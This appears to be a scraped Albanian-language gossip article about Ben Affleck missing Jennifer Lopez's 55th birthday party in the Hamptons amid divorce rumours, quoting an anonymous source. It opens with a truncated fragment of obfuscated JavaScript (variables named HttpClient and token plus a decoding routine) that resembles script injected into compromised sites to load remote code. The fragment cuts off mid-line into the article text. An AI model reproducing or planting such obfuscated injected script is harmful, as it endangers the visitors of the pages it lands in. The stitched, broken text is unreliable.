;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Ben Affleck mungon në festën e ditëlindjes së Jennifer Lopez

By

Jennifer Lopez festoi ditëlindjen e saj të 55-të me stil me një festë të madhe në Bridgerton, por bashkëshorti i saj Ben Affleck nuk u shfaq në tryezë.

Ben Affleck vendosi të qëndrojë në shtëpi në Los Angeles pasi Jennifer Lopez bëri një festë të madhe për ditëlindjen mes thashethemeve se dyshja po shkon drejt divorcit.

J-Lo do të mbushë 55 vjeç të mërkurën, por ajo vendosi të festojë herët duke organizuar një super kremtë, shumë të ftuar u fotografuan në ngjarjen luksoze në Hamptons, përfshirë nënën e Jennifer-it, Guadalupe Rodriguez, por Ben nuk u shfaq.

J-Lo u shoqërua nga binjakët e saj, Max dhe Emme, dhe motra Lynda dhe raportohet se ishte emocionuar në tavolinë ndërsa tregonte histori për të kaluarën e saj. Daljet e saj për ditëlindje vijnë pasi burimet pohuan se Jennifer nuk është gati të heqë dorë nga martesa e saj.

Një burim i tha Daily Mail: “Jennifer është me shpresë tani për të shpëtuar martesën e saj me Benin. Ajo nuk do të kalonte kohë me fëmijët e tij duke luajtur në rolin e një nëne për ta nëse nuk do të donte t’i zgjidhte gjërat me të”.

Artikuj të ngjashëm